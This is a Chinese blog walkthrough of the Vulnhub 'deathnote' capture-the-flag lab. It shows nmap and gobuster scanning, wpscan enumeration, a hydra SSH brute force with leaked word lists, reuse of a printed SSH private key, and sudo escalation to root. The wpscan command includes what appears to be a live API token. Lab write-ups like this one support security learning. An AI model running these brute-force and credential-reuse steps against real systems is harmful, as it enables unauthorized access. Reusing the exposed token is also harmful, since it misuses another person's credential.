guayu-kakeru
0%

Vulnhub-deathnote

发表于 分类于

Vulnhub-deathnote靶机复盘,我最喜欢动漫主题的靶机hhh

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.40  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 10:38 CST
Nmap scan report for 192.168.179.40 (192.168.179.40)
Host is up (0.0028s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
|   256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_  256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 1A:04:7A:CB:01:C4 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   2.76 ms 192.168.179.40 (192.168.179.40)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

web探测

直接访问80端口看看

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.40                           
<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="refresh" content="1; url='http://deathnote.vuln/wordpress" />
  </head>
  <body>
   <cente> <p>Please wait.....</p></center>
  </body>
</html>

而且出现了wordpress 先用目录扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u 192.168.179.40 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -x html,php,jpg,wbpg
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.179.40
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,jpg,wbpg
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 197]
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htaccess.jpg        (Status: 403) [Size: 279]
/.htaccess.wbpg       (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/robots.txt           (Status: 200) [Size: 68]
/.                    (Status: 200) [Size: 197]
/.html                (Status: 403) [Size: 279]
/.html.html           (Status: 403) [Size: 279]
/.html.php            (Status: 403) [Size: 279]
/.html.jpg            (Status: 403) [Size: 279]
/.html.wbpg           (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htpasswd.jpg        (Status: 403) [Size: 279]
/.htpasswd.wbpg       (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htm                 (Status: 403) [Size: 279]
/.htm.html            (Status: 403) [Size: 279]
/.htm.wbpg            (Status: 403) [Size: 279]
/.htm.jpg             (Status: 403) [Size: 279]
/.htm.php             (Status: 403) [Size: 279]
/.htpasswds.html      (Status: 403) [Size: 279]
/.htpasswds           (Status: 403) [Size: 279]
/.htpasswds.php       (Status: 403) [Size: 279]
/.htpasswds.wbpg      (Status: 403) [Size: 279]
/.htpasswds.jpg       (Status: 403) [Size: 279]
/.htgroup             (Status: 403) [Size: 279]
/.htgroup.html        (Status: 403) [Size: 279]
/.htgroup.wbpg        (Status: 403) [Size: 279]
/.htgroup.jpg         (Status: 403) [Size: 279]
/.htgroup.php         (Status: 403) [Size: 279]
/wp-forum.phps        (Status: 403) [Size: 279]
/.htaccess.bak.php    (Status: 403) [Size: 279]
/.htaccess.bak.jpg    (Status: 403) [Size: 279]
/.htaccess.bak        (Status: 403) [Size: 279]
/.htaccess.bak.html   (Status: 403) [Size: 279]
/.htaccess.bak.wbpg   (Status: 403) [Size: 279]
/.htuser.php          (Status: 403) [Size: 279]
/.htuser.html         (Status: 403) [Size: 279]
/.htuser              (Status: 403) [Size: 279]
/.htuser.jpg          (Status: 403) [Size: 279]
/.htuser.wbpg         (Status: 403) [Size: 279]
/.ht                  (Status: 403) [Size: 279]
/.ht.html             (Status: 403) [Size: 279]
/.htc.html            (Status: 403) [Size: 279]
/.ht.php              (Status: 403) [Size: 279]
/.htc                 (Status: 403) [Size: 279]
/.ht.jpg              (Status: 403) [Size: 279]
/.ht.wbpg             (Status: 403) [Size: 279]
/.htc.wbpg            (Status: 403) [Size: 279]
/.htc.php             (Status: 403) [Size: 279]
/.htc.jpg             (Status: 403) [Size: 279]
Progress: 81220 / 81225 (99.99%)
===============================================================
Finished
1
2
3
4
5
6
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.40/robots.txt                
fuck it my dad 
added hint on /important.jpg

ryuk please delete it

这里有提示,提示在/important.jpg 而且有一个疑似用户ryuk
直接在web访问这个路径会显示不出任何东西,只有一个错误图片的标志,但是用curl访问有显示文字

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.179.40/important.jpg
i am Soichiro Yagami, light's father
i have a doubt if L is true about the assumption that light is kira

i can only help you by giving something important

login username : user.txt
i don't know the password.
find it by yourself 
but i think it is in the hint section of site

那就熟悉了哈哈哈 light和L是我知道的人名。 这里提示登录的用户名user.txt,密码在hint section
刚才目录还有扫出一个index.html 现在去看看,但是访问不了,又跳转到一个不知道的url
提示在hint部分,再访问一下192.168.179.40/hint , 没有。/important/hint 没有。
这里我看住了,看了下群主ll104567的视频,发现我的思路有点问题,确实有用到wordpress,
根据直接访问的结果,要修改一下hosts文件

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.40                  
<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="refresh" content="1; url='http://deathnote.vuln/wordpress" />
  </head>
  <body>
   <cente> <p>Please wait.....</p></center>
  </body>
</html>

192.168.179.40 deathnote.vuln




这个my fav line is iamjustic3 一定有用,不然不会放在这里
现在再用wpscan扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kakeru)-[~/tmp]
└─# wpscan --api-token r4NahZxa7hHyx6tcZVYdfivP0YNXqmTaJXwqgMatwmE  --enumerate u,vp --plugins-detection aggressive --url http://deathnote.vuln/wordpress
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________


[+] Upload directory has listing enabled: http://deathnote.vuln/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

找到了一个文件上传的地址,去看看,这里可以查看文件


如果在hint目录下直接看源码也能发现这个路径

在这里找到了user.txt 和 note.txt user.txt肯定是用户名,但是note不一定是密码
先用hydra爆破一下

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kakeru)-[~/tmp]
└─# hydra -L user.txt -P note.txt ssh://192.168.179.40
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-11 12:13:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 731 login tries (l:17/p:43), ~46 tries per task
[DATA] attacking ssh://192.168.179.40:22/
[STATUS] 280.00 tries/min, 280 tries in 00:01h, 453 to do in 00:02h, 14 active
[22][ssh] host: 192.168.179.40   login: l   password: death4me
[STATUS] 283.00 tries/min, 566 tries in 00:02h, 167 to do in 00:01h, 14 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-11 12:16:03

成功拿到用户名和密码
登录l的shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
                                                                                                                    
┌──(root㉿kakeru)-[~/tmp]
└─# ssh l@192.168.179.40    
l@192.168.179.40's password: 
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep  4 06:12:29 2021 from 192.168.1.6
l@deathnote:~$ sudo -l
[sudo] password for l: 
Sorry, user l may not run sudo on deathnote.
l@deathnote:~$

提权

刚刚看了没有sudo,再去看看suid,也没有什么

1
2
3
4
5
6
7
8
9
10
11
12
13
l@deathnote:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/umount
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh

家目录有个user.txt 是Brainfuck 加密,解密之后内容是

1
'i think u got the shell , but you wont be able to kill me -kira'

但是只有一句挑衅的话,没有其他内容
下面因为sudo和suid都用不了,而且/home目录下还有一个kira用户,所以肯定还要先得到kira
那就找一下l的文件,但是属于l的文件太多了,我就找名字是l的

1
2
3
4
5
6
7
8
9
l@deathnote:~$ find / -name "l" 2>/dev/null
/home/l
/usr/share/terminfo/l
/usr/lib/terminfo/l
/var/lib/sudo/lectured/l

l@deathnote:~$ find / -name "L" 2>/dev/null
/usr/share/terminfo/L
/opt/L

发现一个可疑的文件/opt/L

1
2
3
4
5
6
7
8
9
10
11
12
l@deathnote:/opt/L$ ls
fake-notebook-rule  kira-case
l@deathnote:/opt/L$ cd fake-notebook-rule/
l@deathnote:/opt/L/fake-notebook-rule$ ls
case.wav  hint
l@deathnote:/opt/L/fake-notebook-rule$ file hint
hint: ASCII text
l@deathnote:/opt/L/fake-notebook-rule$ cat hint 
use cyberchef

l@deathnote:/opt/L/fake-notebook-rule$ cat case.wav 
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d

果然有用,去cyberchef解密一下
先用from hex解密出一个base64编码,再用base64解密

1
passwd : kiraisevil

另一个文件是一个日记

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
l@deathnote:/opt/L/kira-case$ cat case-file.txt 
the FBI agent died on December 27, 2006

1 week after the investigation of the task-force member/head.
aka.....
Soichiro Yagami's family .


hmmmmmmmmm......
and according to watari ,
he died as other died after Kira targeted them .


and we also found something in 
fake-notebook-rule folder .

死亡笔记的规则哈哈哈哈,看过这个动漫的知道这个梗,原来这就是deathnote的使用方法哈哈哈哈
现在有了kira的密码就切换到kira用户
看了群主ll104567的视频,发现还有另一种思路可以切换到kira

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
l@deathnote:/opt/L/kira-case$ cd /home
l@deathnote:/home$ ls
kira  l
l@deathnote:/home$ cd kira

l@deathnote:/home/kira$ ls -al
total 36
drwxr-xr-x 4 kira kira 4096 Sep  4  2021 .
drwxr-xr-x 4 root root 4096 Jul 19  2021 ..
-rw------- 1 kira kira   39 Feb 10 23:48 .bash_history
-rw-r--r-- 1 kira kira  220 Jul 19  2021 .bash_logout
-rw-r--r-- 1 kira kira 3526 Jul 19  2021 .bashrc
-rwx------ 1 kira root   85 Aug 29  2021 kira.txt
drwxr-xr-x 3 kira kira 4096 Jul 19  2021 .local
-rw-r--r-- 1 kira kira  807 Jul 19  2021 .profile
drwxr-xr-x 2 kira kira 4096 Jul 19  2021 .ssh
l@deathnote:/home/kira$ cd .ssh
l@deathnote:/home/kira/.ssh$ ls
authorized_keys
l@deathnote:/home/kira/.ssh$ cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6z l@deathnote

这个authorized_keys 公钥是l的,那就可以用l的私钥登录kira用户了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
l@deathnote:~/.ssh$ ls
id_rsa  id_rsa.pub  known_hosts
l@deathnote:~/.ssh$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA8olvOzliq1dCltd3iliYq+fIU/CGwumetUmTYeGM5vV5X03AsrQx
+eroQzqrTEeo1c7PagklxkBS4XOiDDxevWDIivck1OWoU/C5nztDm6kn0gBh2ktIuQO96c
ZalExx684Qd/ycvd59DXz6jl+xxpCwWrGEdL/yK3ke+IogSNCbHg8cq2Qi3JeofVdFolNJ
o2zzQRjn38+NQiTe/MtmFwblJYjgI/+rwYvsDMhRd40IT+Eru9rLCx9Z/xNhwYpg9Be+Zo
uixPUjbiOjYr2yVFmRa320ITdhUrCB57qCyCUH7hWbELSbAUPXd8r0w9pPzzsoVEQujFtF
f2kCAhWeswAAA8gGaU36BmlN+gAAAAdzc2gtcnNhAAABAQDyiW87OWKrV0KW13eKWJir58
hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU
5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR
74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3
jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZ
sQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6zAAAAAwEAAQAAAQEAn0yfj1GougtNRE/v
RyHb3QUW8fMIQFs7j6zsrZx8dHIErxEdoQJz1MdymD2fpzFl9lCosOejNOyow0W0yL6aJ1
67OXMMcP0Kq19wO+KsDEB1VBxGKR/LeyG3CiXq9n6jUJL/BCAaPyc0EbjlxL+bv2TnQBpa
emhcQiuCqRHoFIoQAkOqSo7ylyy5trn0aShCUur47VCfb6h/bZPkG+n1am9ZM9P5PJ4LwK
EFdKPJwXvaKvXUZOysKauwRxVpHQvlYR1WtvHj51Xb8iTyIFcGGUk+e0GpxTgaru/e3e8l
Pd09G6ln8XgvzoLP6axaf8s39x3b4T0bVMVwVMs6j6V08QAAAIB3jZQ0VvKwJF7rimibzY
ha7YVcYPKiLfjlC2hEe3wh5af0CvMtq7VvjkmNKFbBGZ41NtRjNRylPtNKn1HA9UI8pUXN
KeKFpmmn6IeszRm86eFmGXB5rnsan/M2Mr3qfIOI9Xpiv0XML8idtSxOBC91rx269BHb2h
6QGsYXA/fhjQAAAIEA/mrWAdzdukdspQuoBRYWgBg1HjW38fn/CXvwHlx+3u61RRTmXLBl
badAoyC5flrOzdubDdozp+p7n4mGBmRI8CPxhyrTKDduVb0TpH1M7NWboYazhqwm6j1Fki
mBM/WOeLxM5VvUAN31jETQajjyDyx0Oo1PDy4NKBJ6I22LHUsAAACBAPQLrb05ptUGPdHC
CLpY3Go52IpEjW+HjP60KQCkyGPBzSJeVbRE5yT7wBIevTIzk7OW1V3Kzx0816X116w4dz
44OmPP8lcu4JTrRmNEO6ptX7dI4BrfbpA49hLsG1/QWuP/QkrE/+aiKEU2mtxOAkj72zJ2
KHY9pOWV1D9Uwas5AAAAC2xAZGVhdGhub3RlAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
l@deathnote:~/.ssh$ ssh kira@192.168.179.40 -i id_rsa
The authenticity of host '192.168.179.40 (192.168.179.40)' can't be established.
ECDSA key fingerprint is SHA256:IT1oaQY12jhOmyoQGZC1hKHtYUWy6i8rET2yKX0KkpI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.179.40' (ECDSA) to the list of known hosts.
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep  4 06:00:09 2021 from 127.0.0.1
kira@deathnote:~$

然后通过kira.txt这个内容,也能找到/opt/L这个文件然后得到kira密码,继续下面操作

1
2
3
4
5
6
7
8
9
kira@deathnote:~$ ls
kira.txt
kira@deathnote:~$ cat kira.txt 
cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp
kira@deathnote:~$ echo "cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp" | base64 -d
please protect one of the following 
1. L (/opt)
2. Misa (/var)kira@deathnote:~$ 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
kira@deathnote:~$ sudo -l
[sudo] password for kira: 
Matching Defaults entries for kira on deathnote:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kira may run the following commands on deathnote:
    (ALL : ALL) ALL
kira@deathnote:~$ su - root
Password: 
su: Authentication failure
kira@deathnote:~$ sudo /bin/bash
root@deathnote:/home/kira# id
uid=0(root) gid=0(root) groups=0(root)
root@deathnote:/home/kira#

这就是kami吗,能有任何的权限,


特地找出名场面哈哈哈,这个番真的超级好看无敌推荐